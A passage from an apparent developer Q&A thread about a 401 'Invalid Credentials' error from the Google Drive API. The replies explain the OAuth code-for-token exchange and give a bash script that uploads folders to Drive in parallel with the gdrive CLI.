"reason": "authError",
"message": "Invalid Credentials",
"locationType": "header",
"location": "Authorization"
}
],
"code": 401,
"message": "Invalid Credentials"
}
}
The error seems to be a wrong token, but I always get new tokens and it always gives the same error!
Can someone help me?
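One hedged observation about the flow above: with response_type=code, the value copied from that consent page is an OAuth2 authorization code (they begin with "4/", like the value in the Authorization header above), not an access token, so it still needs to be exchanged at Google's token endpoint before it can be used as a Bearer token. A sketch of that exchange with curl (THE_CODE and YOUR_CLIENT_SECRET are placeholders; the client id is the one from the URL above):
curl -d "code=THE_CODE" \
  -d "client_id=165834794520-tit58jbii1u8itv8q8urjlda1tobsvf1.apps.googleusercontent.com" \
  -d "client_secret=YOUR_CLIENT_SECRET" \
  -d "redirect_uri=urn:ietf:wg:oauth:2.0:oob" \
  -d "grant_type=authorization_code" \
  https://oauth2.googleapis.com/token
Note also that scope=profile in the consent URL does not grant Drive access; a Drive scope such as https://www.googleapis.com/auth/drive.file would be needed as well.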
You can use this script:
MAX_THREAD_NO=32
runningPids=()
canStartNewBatch=1
sequenceNo=0
# Create remote folder corresponding with the name of the local folder.
# $1: parentId: remote (gdrive) parent folder id
# $2: folderName: local folder name need to create in remote parent folder
# Usage:
# folderId=$( makeRemoteDir <parentId> <folderName> )
function makeRemoteDir () {
resultPrefix="Directory "
resultSuffix=" created"
folderId=`gdrive mkdir -p $1 $2`
folderId=${folderId%"$resultSuffix"}
folderId=${folderId#"$resultPrefix"}
echo "$folderId"
}
# Upload the files contained in the local folder to remote folder.
# $1: remoteFolderId: remote (gdrive) folder id
# $2: localFolderFullPath: the full path of local folder name need to upload
function uploadFolder () {
# Do with each item (folder or file) in the folder $2
for item in $2/*; do
while [[ ${#runningPids[@]} -ne 0 ]] && [[ canStartNewBatch -ne 1 ]]; do
removablePids=()
# Scan every PID in the running PIDs list to see if it finished or not
for pid in "${runningPids[@]}"; do
if ! ps -p $pid > /dev/null; then
removablePids+=($pid)
fi
done
if [[ ${#removablePids[@]} -ne 0 ]]; then
# Remove finished PID from the runningPids, and allow new PID put in
for removablePid in "${removablePids[@]}"; do
runningPids=( ${runningPids[@]/$removablePid} )
done
canStartNewBatch=1
else
# If no more PID finished yet, then scan again after few delay time
sleep 0.05
fi
done
canStartNewBatch=1
# If the item is a file, upload it to remote
if [[ -f "$item" ]]; then
#((sequenceNo++))
#echo "$sequenceNo $item"
gdrive upload -p $1 "$item" &
pid=$!
runningPids+=($pid)
if [ ${#runningPids[@]} -eq $MAX_THREAD_NO ]; then
#echo ${#runningPids[@]}
canStartNewBatch=0
fi
fi
# If the item is a folder, recursive call uploadFolder
if [[ -d "$item" ]]; then
# Create a sub-folder (named after the local folder) in the remote folder whose id is $1, and store the new folder id
newFolderId=$( makeRemoteDir $1 $(basename ${item}) )
# Recursive call upload
uploadFolder $newFolderId "$item"
fi
done
}
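A usage sketch for the two functions above, assuming the gdrive CLI is installed and already authenticated (the folder id and local path are placeholders):
remoteParentId="PARENT_FOLDER_ID"   # placeholder: id of an existing Drive folder
localDir="/path/to/local/folder"    # placeholder: local folder to upload
# Create a remote folder mirroring the local one, then upload its contents recursively
rootFolderId=$( makeRemoteDir "$remoteParentId" "$(basename "$localDir")" )
uploadFolder "$rootFolderId" "$localDir"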